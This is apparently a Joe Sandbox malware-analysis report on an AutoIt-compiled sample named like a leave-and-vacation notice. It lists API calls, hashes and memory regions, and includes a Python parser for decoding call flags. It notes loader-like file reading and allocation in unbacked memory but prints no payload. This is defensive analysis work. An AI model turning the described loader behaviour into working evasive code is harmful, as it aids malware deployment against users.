                                                      • Opcode ID: eceb2dbcf65761dd2e7568c44e0039e86190eeb58b4986c5707c7cde9601c79b
                                                      • Instruction ID: 5304b202a51465437b152457a7bbe11852bc9db0ee8671f6642ae6464872791c
                                                      • Opcode Fuzzy Hash: eceb2dbcf65761dd2e7568c44e0039e86190eeb58b4986c5707c7cde9601c79b
                                                      • Instruction Fuzzy Hash: CF72DF35E042099FEF14EF94C881EBEB7B5FF48310F14805AE909AB251D735AE45EB91
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
• Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID:
                                                      • API String ID: 3964851224-0
                                                      • Opcode ID: 6ea6a44effa3ec8be281eef0b01ed37dd436091fc7968989a1d00bedb7e6a0f1
                                                      • Instruction ID: bcd92255ccc785f548c22eeb8ef22a5c4ea8ebd42cc637ea527edff843617573
                                                      • Opcode Fuzzy Hash: 6ea6a44effa3ec8be281eef0b01ed37dd436091fc7968989a1d00bedb7e6a0f1
                                                      • Instruction Fuzzy Hash: F9928C71A083419FEB24DF18C480B6AB7E1BF88314F14885DF98A8B362D775ED45EB52
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F8E959
                                                      • timeGetTime.WINMM ref: 00F8EBFA
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F8ED2E
                                                      • TranslateMessage.USER32(?), ref: 00F8ED3F
                                                      • DispatchMessageW.USER32(?), ref: 00F8ED4A
                                                      • LockWindowUpdate.USER32(00000000), ref: 00F8ED79
                                                      • DestroyWindow.USER32 ref: 00F8ED85
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F8ED9F
                                                      • Sleep.KERNEL32(0000000A), ref: 00FF5270
                                                      • TranslateMessage.USER32(?), ref: 00FF59F7
                                                      • DispatchMessageW.USER32(?), ref: 00FF5A05
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FF5A19
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
• Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                      • API String ID: 2641332412-570651680
                                                      • Opcode ID: cef8d56d8c36c14db46ac23fb458cb15b6460fb02eb7b6ffd2eaf01cc67ceeef
                                                      • Instruction ID: f4436fb93201fea7812037325f5dd41807d131b7bdd9fa087e4b70675ce14f98
                                                      • Opcode Fuzzy Hash: cef8d56d8c36c14db46ac23fb458cb15b6460fb02eb7b6ffd2eaf01cc67ceeef
                                                      • Instruction Fuzzy Hash: 6F625A71904344DFDB24EF64C885BEA77E4BF84710F04096DFA868B292D779E848EB52
                                                      APIs
                                                      • ___createFile.LIBCMT ref: 00FB5EC3
                                                      • ___createFile.LIBCMT ref: 00FB5F04
                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00FB5F2D
                                                      • __dosmaperr.LIBCMT ref: 00FB5F34
                                                      • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00FB5F47
                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00FB5F6A
                                                      • __dosmaperr.LIBCMT ref: 00FB5F73
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00FB5F7C
                                                      • __set_osfhnd.LIBCMT ref: 00FB5FAC
                                                      • __lseeki64_nolock.LIBCMT ref: 00FB6016
                                                      • __close_nolock.LIBCMT ref: 00FB603C
                                                      • __chsize_nolock.LIBCMT ref: 00FB606C
                                                      • __lseeki64_nolock.LIBCMT ref: 00FB607E
                                                      • __lseeki64_nolock.LIBCMT ref: 00FB6176
                                                      • __lseeki64_nolock.LIBCMT ref: 00FB618B
                                                      • __close_nolock.LIBCMT ref: 00FB61EB
                                                        • Part of subcall function 00FAEA9C: CloseHandle.KERNELBASE(00000000,0102EEF4,00000000,?,00FB6041,0102EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00FAEAEC
                                                        • Part of subcall function 00FAEA9C: GetLastError.KERNEL32(?,00FB6041,0102EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00FAEAF6
                                                        • Part of subcall function 00FAEA9C: __free_osfhnd.LIBCMT ref: 00FAEB03
                                                        • Part of subcall function 00FAEA9C: __dosmaperr.LIBCMT ref: 00FAEB25
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      • __lseeki64_nolock.LIBCMT ref: 00FB620D
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00FB6342
                                                      • ___createFile.LIBCMT ref: 00FB6361
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00FB636E
                                                      • __dosmaperr.LIBCMT ref: 00FB6375
                                                      • __free_osfhnd.LIBCMT ref: 00FB6395
                                                      • __invoke_watson.LIBCMT ref: 00FB63C3
                                                      • __wsopen_helper.LIBCMT ref: 00FB63DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                      • String ID: @
                                                      • API String ID: 3896587723-2766056989
                                                      • Opcode ID: 5a0d85496aad26145457921d0aa33142ee0562ed40cb35f67efd96be0820c179
                                                      • Instruction ID: c236f009df95340f82b340973e3ff05d1128a63e00aa5e8fab8e817c4ab31fca
                                                      • Opcode Fuzzy Hash: 5a0d85496aad26145457921d0aa33142ee0562ed40cb35f67efd96be0820c179
                                                      • Instruction Fuzzy Hash: 6D2213B1D0460A9BEF299E6ADC85BFD7B61EB05724F284228E521DB2D1C33D8D40EF51

                                                      Control-flow Graph

                                                      APIs
                                                      • _wcscpy.LIBCMT ref: 00FCFA96
                                                      • _wcschr.LIBCMT ref: 00FCFAA4
                                                      • _wcscpy.LIBCMT ref: 00FCFABB
                                                      • _wcscat.LIBCMT ref: 00FCFACA
                                                      • _wcscat.LIBCMT ref: 00FCFAE8
                                                      • _wcscpy.LIBCMT ref: 00FCFB09
                                                      • __wsplitpath.LIBCMT ref: 00FCFBE6
                                                      • _wcscpy.LIBCMT ref: 00FCFC0B
                                                      • _wcscpy.LIBCMT ref: 00FCFC1D
                                                      • _wcscpy.LIBCMT ref: 00FCFC32
                                                      • _wcscat.LIBCMT ref: 00FCFC47
                                                      • _wcscat.LIBCMT ref: 00FCFC59
                                                      • _wcscat.LIBCMT ref: 00FCFC6E
                                                        • Part of subcall function 00FCBFA4: _wcscmp.LIBCMT ref: 00FCC03E
                                                        • Part of subcall function 00FCBFA4: __wsplitpath.LIBCMT ref: 00FCC083
                                                        • Part of subcall function 00FCBFA4: _wcscpy.LIBCMT ref: 00FCC096
                                                        • Part of subcall function 00FCBFA4: _wcscat.LIBCMT ref: 00FCC0A9
                                                        • Part of subcall function 00FCBFA4: __wsplitpath.LIBCMT ref: 00FCC0CE
                                                        • Part of subcall function 00FCBFA4: _wcscat.LIBCMT ref: 00FCC0E4
                                                        • Part of subcall function 00FCBFA4: _wcscat.LIBCMT ref: 00FCC0F7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                      • API String ID: 2955681530-2806939583
                                                      • Opcode ID: 77eec82ebe525ae28b72e0a1baf3e660ca97b62b84bbb8d9da0935720b75a24e
                                                      • Instruction ID: 8952c2f14831863ae5fbd63c8104da7252a996c59fed52a8aaab07f4649205ad
                                                      • Opcode Fuzzy Hash: 77eec82ebe525ae28b72e0a1baf3e660ca97b62b84bbb8d9da0935720b75a24e
                                                      • Instruction Fuzzy Hash: 6991B472504306AFDB10EB54CD52F9AB3E9BF84310F04482DF99997291DB38FA48EB91

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00F83F86
                                                      • RegisterClassExW.USER32(00000030), ref: 00F83FB0
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F83FC1
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00F83FDE
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F83FEE
                                                      • LoadIconW.USER32(000000A9), ref: 00F84004
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F84013
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: e03449933ea24f55255d64c815b00e3777b020bea6e32d4c642cb1df63fd96cc
                                                      • Instruction ID: c54d66d093a40185a68556bdc5da24147111ae73767fdadb218bd6e9a4a93c15
                                                      • Opcode Fuzzy Hash: e03449933ea24f55255d64c815b00e3777b020bea6e32d4c642cb1df63fd96cc
                                                      • Instruction Fuzzy Hash: 5621C9B9900318AFDB21DFE4E989BCDBBB4FB08704F00411AF595A6284D7BA55848FA1

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00FCBDB4: __time64.LIBCMT ref: 00FCBDBE
                                                        • Part of subcall function 00F84517: _fseek.LIBCMT ref: 00F8452F
                                                      • __wsplitpath.LIBCMT ref: 00FCC083
                                                        • Part of subcall function 00FA1DFC: __wsplitpath_helper.LIBCMT ref: 00FA1E3C
                                                      • _wcscpy.LIBCMT ref: 00FCC096
                                                      • _wcscat.LIBCMT ref: 00FCC0A9
                                                      • __wsplitpath.LIBCMT ref: 00FCC0CE
                                                      • _wcscat.LIBCMT ref: 00FCC0E4
                                                      • _wcscat.LIBCMT ref: 00FCC0F7
                                                      • _wcscmp.LIBCMT ref: 00FCC03E
                                                        • Part of subcall function 00FCC56D: _wcscmp.LIBCMT ref: 00FCC65D
                                                        • Part of subcall function 00FCC56D: _wcscmp.LIBCMT ref: 00FCC670
                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FCC2A1
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FCC338
                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FCC34E
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FCC35F
                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FCC371
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                      • String ID:
                                                      • API String ID: 2378138488-0
                                                      • Opcode ID: dcb3f3e91483a015ed9ea7c87a11b954c9cdc1260f7775a112cbac212de8fce1
                                                      • Instruction ID: 02b570936d740955bd859d3db51cff511b8398de19c85c0d535c1b130044a6e8
                                                      • Opcode Fuzzy Hash: dcb3f3e91483a015ed9ea7c87a11b954c9cdc1260f7775a112cbac212de8fce1
                                                      • Instruction Fuzzy Hash: 0FC129B1D0021AAADF21DF95CD82FDEB7BDAF49310F0040AAF609E6151DB359A849F61

                                                      Control-flow Graph

                                                       Control-flow graph not rendered here (legend: Executed / Not Executed). The node list shows the function entry at f83742, blocks calling DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu and PostQuitMessage (consistent with a window procedure), and out-of-line blocks at ff1da3-ff1ea2 calling MoveWindow and SetFocus; which blocks executed is not recoverable from the text.
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00F837B3
                                                      • KillTimer.USER32(?,00000001), ref: 00F837DD
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F83800
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F8380B
                                                      • CreatePopupMenu.USER32 ref: 00F8381F
                                                      • PostQuitMessage.USER32(00000000), ref: 00F8382E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: cfe1ef69035823d3e69aac93fbf157b4c2b633d96eadf9e49fa9886c7ce29c12
                                                      • Instruction ID: 2df640bf868ff8bbe9710b0fb315484bfa1c91f11b0d10a343c630006a094cf4
                                                      • Opcode Fuzzy Hash: cfe1ef69035823d3e69aac93fbf157b4c2b633d96eadf9e49fa9886c7ce29c12
                                                      • Instruction Fuzzy Hash: 14415EF660814997DB24BF68ED8ABFD3665FB04B10F000115F641921A1DB7DED40B761

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00F83E79
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00F83E88
                                                      • LoadIconW.USER32(00000063), ref: 00F83E9E
                                                      • LoadIconW.USER32(000000A4), ref: 00F83EB0
                                                      • LoadIconW.USER32(000000A2), ref: 00F83EC2
                                                        • Part of subcall function 00F84024: LoadImageW.USER32(00F80000,00000063,00000001,00000010,00000010,00000000), ref: 00F84048
                                                      • RegisterClassExW.USER32(?), ref: 00F83F30
                                                        • Part of subcall function 00F83F53: GetSysColorBrush.USER32(0000000F), ref: 00F83F86
                                                        • Part of subcall function 00F83F53: RegisterClassExW.USER32(00000030), ref: 00F83FB0
                                                        • Part of subcall function 00F83F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F83FC1
                                                        • Part of subcall function 00F83F53: InitCommonControlsEx.COMCTL32(?), ref: 00F83FDE
                                                        • Part of subcall function 00F83F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F83FEE
                                                        • Part of subcall function 00F83F53: LoadIconW.USER32(000000A9), ref: 00F84004
                                                        • Part of subcall function 00F83F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F84013
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: 42f11738a85d480aca6c94e48ef31f3f444a824a3e053534e1bf2bd85d6815a9
                                                      • Instruction ID: fcc4c109fe25f5277f2341fbff3f90b0cebf1f6887417158a5a02764f33f197f
                                                      • Opcode Fuzzy Hash: 42f11738a85d480aca6c94e48ef31f3f444a824a3e053534e1bf2bd85d6815a9
                                                      • Instruction Fuzzy Hash: A62177F8E04354AFCB21DFE9E985A99BFF5FB48710F00411AE244A32A4D37A6544CF91

                                                      Control-flow Graph

                                                       Control-flow graph not rendered here (legend: Executed / Not Executed). The node list shows the entry at 1a4c3d0 and a loop from 1a4c485 through CreateFileW, VirtualAlloc, ReadFile, a second VirtualAlloc, CloseHandle and VirtualFree back to 1a4c485, with an exit path through a further VirtualFree at 1a4c6bc. VirtualAlloc, ReadFile and CloseHandle appear only in the graph, not in the APIs list below.
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01A4C4A1
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01A4C6C7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130782459.0000000001A49000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A49000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a49000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CreateFileFreeVirtual
                                                      • String ID:
                                                      • API String ID: 204039940-0
                                                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                      • Instruction ID: 95b37a755828a9d59744a82d4d5d4f6c959b6619f467942d18a64e940f172be5
                                                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                      • Instruction Fuzzy Hash: DCA13B70E01209EBDB14CFA8C994BEEBBB5FF88314F209159E105BB285D775AA40CF95
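The two APIs recorded for this region live in memory that is "based on PE: false", i.e. at 0x1A49000 with no module on disk behind it, which is why a CreateFileW / ReadFile / VirtualAlloc loop here matters more than the same calls would inside the AutoIt runtime at 0xF80000. Joe Sandbox prints raw stack slots as arguments, so the flag values have to be decoded by hand. The Python below is an added example, not Joe Sandbox tooling or code from the sample, that parses "APIs" lines of this report format into records and decodes the CreateFileW and VirtualFree flags. The line grammar is inferred from the listings on this page, and because the slot holding the first parameter is not at a fixed index across listings (compare the RegOpenKeyExW line further down, where the first slot is the HKEY), the decoder anchors on the distinctive GENERIC_* and MEM_* values rather than on a fixed position.

```python
"""Parse Joe Sandbox 'APIs' listing lines and decode CreateFileW / VirtualFree
flag arguments. Added example; the line grammar is inferred from this report."""
import re

# e.g. "CreateFileW.KERNELBASE(00000000,?,80000000,...), ref: 01A4C4A1"
#      "CreatePopupMenu.USER32 ref: 00F8381F"
#      "Part of subcall function 00FAEA9C: __free_osfhnd.LIBCMT ref: 00FAEB03"
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTRS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
         0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x40000000: "FILE_FLAG_OVERLAPPED"}
FREE_TYPE = {0x4000: "MEM_DECOMMIT", 0x8000: "MEM_RELEASE"}


def _parse_arg(tok):
    tok = tok.strip()
    if tok == "?":
        return None                      # slot the sandbox could not resolve
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)
    return tok                           # resolved string argument


def parse_api_lines(text):
    """Return one record per 'APIs' line; bullets and indentation are ignored."""
    records = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        records.append({
            "func": m.group("func"),
            "module": m.group("module"),
            "args": [_parse_arg(t) for t in raw.split(",")] if raw else [],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("subcall"),
        })
    return records


def _bits(value, table):
    if not isinstance(value, int):
        return "?"
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else hex(value)


def _name(value, table):
    if not isinstance(value, int):
        return "?"
    return table.get(value, hex(value))


def decode_create_file(args):
    """Anchor on the dwDesiredAccess slot (only GENERIC_* bits set) because the
    index of lpFileName differs between listings, then read the parameters
    that follow it in CreateFileW order."""
    for i, v in enumerate(args):
        if isinstance(v, int) and v and (v & 0x0FFFFFFF) == 0 and len(args) > i + 4:
            return {
                "access": _bits(v, GENERIC),
                "share": _bits(args[i + 1], SHARE),
                "disposition": _name(args[i + 3], DISPOSITION),
                "attributes": _bits(args[i + 4], ATTRS),
            }
    return None


def decode_virtual_free(args):
    """Anchor on dwFreeType (MEM_DECOMMIT / MEM_RELEASE); the two slots before
    it are lpAddress and dwSize."""
    for i, v in enumerate(args):
        if v in FREE_TYPE and i >= 2:
            return {"address": args[i - 2], "size": args[i - 1],
                    "free_type": FREE_TYPE[v]}
    return None


# Sample input: lines copied from the listings on this page.
REPORT_LINES = r"""
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01A4C4A1
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01A4C6C7
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00F84A1D
• CreatePopupMenu.USER32 ref: 00F8381F
  • Part of subcall function 00FAEA9C: __free_osfhnd.LIBCMT ref: 00FAEB03
"""

if __name__ == "__main__":
    decoders = {"CreateFileW": decode_create_file, "VirtualFree": decode_virtual_free}
    for rec in parse_api_lines(REPORT_LINES):
        decoded = decoders.get(rec["func"], lambda a: None)(rec["args"])
        print(f"{rec['ref']:08X} {rec['func']}.{rec['module']} {decoded or rec['args']}")
```

Run against the listing, the CreateFileW call decodes to GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, and the VirtualFree call to MEM_RELEASE with a zero size, which is the required combination for releasing a whole region. The same anchoring idea extends to other flag-bearing APIs (VirtualAlloc's MEM_COMMIT/PAGE_* pair, for instance), but each one needs its own table; the tables above cover only the values that appear on this page plus their common neighbours.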

                                                      Control-flow Graph

                                                       Control-flow graph not rendered here (legend: Executed / Not Executed). The node list shows the entry at f849fb (RegOpenKeyExW), a first RegQueryValueExW at ff41cc, a second RegQueryValueExW at ff41e5 after two internal calls, and RegCloseKey at ff4246.
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00F84A1D
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FF41DB
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FF421A
                                                      • RegCloseKey.ADVAPI32(?), ref: 00FF4249
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                       • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$CloseOpen
                                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                                      • API String ID: 1586453840-614718249
